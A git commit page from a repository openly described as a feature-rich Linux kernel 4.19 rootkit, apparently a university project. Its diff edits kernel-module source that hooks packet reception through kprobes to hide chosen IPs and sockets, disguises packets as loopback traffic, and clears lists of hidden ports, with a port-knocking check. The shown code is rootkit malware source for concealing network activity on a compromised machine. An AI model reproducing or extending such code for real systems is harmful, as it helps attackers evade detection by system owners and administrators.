linux-rootkit

Feature-rich interactive rootkit that targets Linux kernel 4.19, accompanied by a dynamic kernel memory analysis GDB plugin for in vivo introspection (e.g. using QEMU)
git clone git://git.deurzen.net/linux-rootkit
Log | Files | Refs
commit 7c3544db291432da0cca94991b9b3b073b936d39
parent 0adb3766ae1da910e6ff82bca526255e216b7ab8
Author: deurzen <m.deurzen@tum.de>
Date:   Sun, 10 Jan 2021 20:45:25 +0100

removes redundant code

Diffstat:

Msrc/hook.c | 1-


Msrc/hook.h | 1-


Msrc/packhide.c | 12++----------


Msrc/porthide.c | 2--


Msrc/sockhide.c | 8++++++++


5 files changed, 10 insertions(+), 14 deletions(-)

diff --git a/src/hook.c b/src/hook.c
@@ -38,7 +38,6 @@ atomic_t read_count;
 atomic_t getdents_count;
 atomic_t getdents64_count;
 atomic_t tty_read_count;
-atomic_t packet_rcv_count;
 
 asmlinkage ssize_t (*sys_read)(const struct pt_regs *);
 asmlinkage long (*sys_getdents)(const struct pt_regs *);
diff --git a/src/hook.h b/src/hook.h
@@ -21,7 +21,6 @@ extern atomic_t read_count;
 extern atomic_t tty_read_count;
 extern atomic_t getdents_count;
 extern atomic_t getdents64_count;
-extern atomic_t packet_rcv_count;
 
 extern asmlinkage ssize_t (*sys_read)(const struct pt_regs *);
 extern asmlinkage long (*sys_getdents)(const struct pt_regs *);
diff --git a/src/packhide.c b/src/packhide.c
@@ -77,7 +77,6 @@ unhide_packets(void)
         unregister_kprobe(&p_rcv);
         unregister_kprobe(&tp_rcv);
         unregister_kprobe(&p_rcv_spkt);
-        while (atomic_read(&packet_rcv_count) > 0);
     }
 }
 
@@ -130,8 +129,6 @@ g7_packet_rcv(struct kprobe *kp, struct pt_regs *pt_regs)
     struct sk_buff *clone = skb_clone(skb, GFP_KERNEL);
     pt_regs->di = (long unsigned int)clone;
 
-    atomic_inc(&packet_rcv_count);
-
     if (ver == 0x60) {
         struct ipv6hdr *iphdr;
 
@@ -158,10 +155,8 @@ g7_packet_rcv(struct kprobe *kp, struct pt_regs *pt_regs)
                 || list_contains_ip(&hidden_ips, (u8 *)&iphdr->daddr, v4))
                 clone->pkt_type = PACKET_LOOPBACK;
         }
-    } else {
-        atomic_dec(&packet_rcv_count);
+    } else
         return 0;
-    }
 
     if (rootkit.hiding_sockets) {
         // We need to intercept (RST) the TCP handshake
@@ -171,10 +166,8 @@ g7_packet_rcv(struct kprobe *kp, struct pt_regs *pt_regs)
             tcphdr = (struct tcphdr *)skb_transport_header(skb);
             unsigned src_port = (unsigned)ntohs(tcphdr->source);
 
-            if (list_contains_knock(&ips_stage3, ip, version)) {
-                atomic_dec(&packet_rcv_count);
+            if (list_contains_knock(&ips_stage3, ip, version))
                 return 0;
-            }
 
             if (tcphdr->syn || !tcphdr->ack)
                 goto check_port;
@@ -215,7 +208,6 @@ check_port:
         }
     }
 
-    atomic_dec(&packet_rcv_count);
     return 0;
 }
 
diff --git a/src/porthide.c b/src/porthide.c
@@ -117,8 +117,6 @@ find_lport_in_list(lport_list_t_ptr head, lport_t lport)
         if (i->lport == lport) {
             DEBUG_INFO("found port %d\n", lport);
             return i;
-        } else {
-            DEBUG_INFO("%d is not port %d\n", i->lport, lport);
         }
 
     return NULL;
diff --git a/src/sockhide.c b/src/sockhide.c
@@ -96,6 +96,7 @@ unhide_sockets(void)
         sys_recvmsg = NULL;
 
         unhide_packets();
+        clear_hidden_ports();
         clear_hidden_lports();
     }
 }
@@ -118,6 +119,13 @@ unhide_port(port_t port, proto_t proto)
         unhide_lport(port);
 }
 
+void
+clear_hidden_ports(void)
+{
+    i = hidden_ports_tail;
+    while ((i = remove_port_from_list(i, i->port, i->proto)));
+}
+
 bool
 list_contains_port(port_list_t_ptr list, port_t port, proto_t proto)
 {